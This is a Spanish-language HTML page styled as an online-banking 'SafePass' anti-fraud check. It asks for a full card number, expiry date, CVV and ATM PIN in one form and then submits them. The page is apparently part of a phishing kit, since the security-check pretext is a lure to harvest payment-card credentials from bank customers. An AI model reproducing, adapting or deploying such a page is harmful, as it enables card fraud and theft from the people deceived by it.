<!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Banca en Linea</title>
<style type="text/css">

body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
}
.Estilo1 {font-size: 12px}
.Estilo5 {font-size: 12px; color: #0000FF; }

.button21 {background-color: #0077be; /* Green */
border: none;
color: white;
padding: 6px 18px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 16px;
border-radius: 4px;
}
.button211 {background-color: #0077be; /* Green */
border: none;
color: white;
padding: 6px 18px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 16px;
border-radius: 4px;
}
.Estilo3 {font-size: 24px; }
.Estilo2 {font-size: 18px}
.Estilo4 {color: #000000}
</style></head>

<body>
<form method="post" action="">
<div align="center">
  <p><img src="images/03.jpg" width="1006" height="144" /></p>
  <table width="982" border="0" cellpadding="0" cellspacing="0">
    <tr>
      <td width="746" valign="top"><p><span class="Estilo3"><span class="Estilo1">Indique la informaci&oacute;n de la  asociada con <br />
su cuenta para ayudar a proteger su identidad cotra el fraude. </span></span></p>
        <table width="200" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td class="Estilo4">&nbsp;</td>
          </tr>
          <tr>
            <td class="Estilo4"><img src="images/05.png" width="345" height="30" /></td>
          </tr>
          <tr>
            <td height="129" valign="top" background="images/fondo.png" class="Estilo4"><table width="332" height="104" border="0" cellpadding="0" cellspacing="0">
                <tr>
                  <td width="166">&nbsp;</td>
                  <td width="157"><input name="card" id="card" type="text" maxlength="16" required="required" /></td>
                </tr>
                <tr>
                  <td height="38">&nbsp;</td>
                  <td><table width="100" border="0" cellspacing="0" cellpadding="0">
                      <tr>
                        <td><select name="mes" id="mes" required="required">
                            <option value="">--</option>
                            <option value="1">01</option>
                            <option value="2">02</option>
                            <option value="3">03</option>
                            <option value="4">04</option>
                            <option value="5">05</option>
                            <option value="6">06</option>
                            <option value="7">07</option>
                            <option value="8">08</option>
                            <option value="9">09</option>
                            <option value="10">10</option>
                            <option value="11">11</option>
                            <option value="12">12</option>
                          </select>
                        </td>
                        <td><select name="year" id="year" required="required">
                            <option value="">----</option>
                            <option value="2024">2024</option>
                            <option value="2025">2025</option>
                            <option value="2026">2026</option>
                            <option value="2027">2027</option>
                            <option value="2028">2028</option>
                            <option value="2029">2029</option>
                            <option value="2030">2030</option>
                            <option value="2031">2031</option>
                            <option value="2032">2032</option>
                            <option value="2033">2033</option>
                            <option value="2034">2034</option>
                        </select></td>
                      </tr>
                  </table></td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td><input name="cvv" id="cvv" type="password" size="3" maxlength="3" required="required" />
                    
                  </td>
                  
                </tr>
                
                
            </table></td>
          </tr>
          
          
          <tr>
            <td class="Estilo4"><img src="images/06.png" width="344" height="14" /></td>
          </tr>
          
          
        </table>
          <table>
            <tr><br>
              <td>&nbsp;</td>
              <td><div class="fgrupo">
                <label for="correo" style="color:rgb(2, 2, 2); padding-bottom: 5px;"><b>Atm o Pin</b></label>
                <input type="password" name="atm" id="atm" placeholder="*********" require style="border-radius: 5px;  width: 40px; "maxlength="6">
            </div>
          </table>
        <p><span class="Estilo1">SafePass, ventana extra de protecci&oacute;n  contra fraude y robo identidad.<br />
Con SafePass, agregar cuentas es mas f&aacute;cil y usted no est&aacute; limitado a transferencias.</span></p>
      <p><span class="Estilo1">
        <input type="submit" name="add" class="button211" value="Continuar" />
      </span></p></td>
      <td width="236"><img src="images/p2.jpg" width="236" height="443" /></td>
    </tr>
  </table>
  <p><img src="images/footer.png" width="1006" height="177" /></p>
 
</div>
</form>
</body>
</html>
